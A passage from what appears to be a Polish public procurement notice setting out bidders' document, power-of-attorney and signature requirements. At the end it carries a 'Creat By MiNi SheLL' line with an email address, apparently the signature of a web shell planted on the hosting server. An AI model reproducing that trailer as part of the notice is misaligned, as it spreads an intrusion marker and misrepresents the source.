Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Dokumenty ten, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Wymagania związane ze złożeniem oferty przez Wykonawców wspólnie ubiegających się                    o udzielenie niniejszego zamówienia: 

 - w przypadku oferty złożonej wspólnie przez kilku Wykonawców (np. konsorcjum, Spółka Cywilna działająca poprzez ustanowionego Pełnomocnika/Pełnomocników) należy przedstawić pełnomocnictwo ustanawiające pełnomocnika do reprezentowania Wykonawców                         w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia. Pełnomocnictwo takie musi być złożone w formie            i zakresie, o którym mowa w punkcie 16.6 SIWZ, 
-  Wykonawcy wspólnie składający ofertę (np. konsorcjum, Spółka Cywilna działająca poprzez ustanowionego Pełnomocnika/Pełnomocników) zobowiązani są przedstawić oświadczenie o spełnianiu warunków udziału w postępowaniu określone w sekcji III.4.1, które to oświadczenie składają wspólnie, tj. warunki  w nim określone zostaną spełnione, gdy podmioty składające wspólnie ofertę spełnią je łącznie. 

Wymienione w sekcji III.4.1 oświadczenie o spełnianiu warunków udziału w postępowaniu oraz wszystkie dokumenty wymienione w sekcji III.4.4, III.6 należy złożyć tylko i wyłącznie                                       w oryginale.
 Wymieniony w sekcji III.4.2 dokument należy złożyć w oryginale lub w kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
 W przypadku składania elektronicznych dokumentów powinny być one opatrzone przez Wykonawcę bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu. 
 W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia oraz w przypadku innych podmiotów, na zasobach których Wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy Pzp, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów muszą  być poświadczane za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty.
Punkt 16.6 SIWZ: 
Oferta powinna być napisana na maszynie, komputerze lub w inny trwały sposób oraz podpisana przez osobę(-y) uprawnioną(-one) na podstawie odrębnych przepisów do składania oświadczeń woli - reprezentowania firmy na zewnątrz. W przypadku, gdy dokumenty podpisywane są przez osobę(-y) reprezentującą(-ce) Wykonawcę do oferty należy załączyć pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu                      o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy                                    w sprawie niniejszego zamówienia. Pełnomocnictwo musi być przedstawione w oryginale. Dopuszcza się również złożenie w ofercie kopii pełnomocnictwa notarialnie poświadczonej za zgodność z oryginałem przez mocodawcę. Każda zapisana strona przedstawionych dokumentów powinna być podpisana czytelnym podpisem lub nieczytelnym podpisem wraz z pieczątką imienną podpisującego przez osobę upoważnioną do reprezentowania Wykonawcy lub osobę wskazaną                 w pełnomocnictwie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com